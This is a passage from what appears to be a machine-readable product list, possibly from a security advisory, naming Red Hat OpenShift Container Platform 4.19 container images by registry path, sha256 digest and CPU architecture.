"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
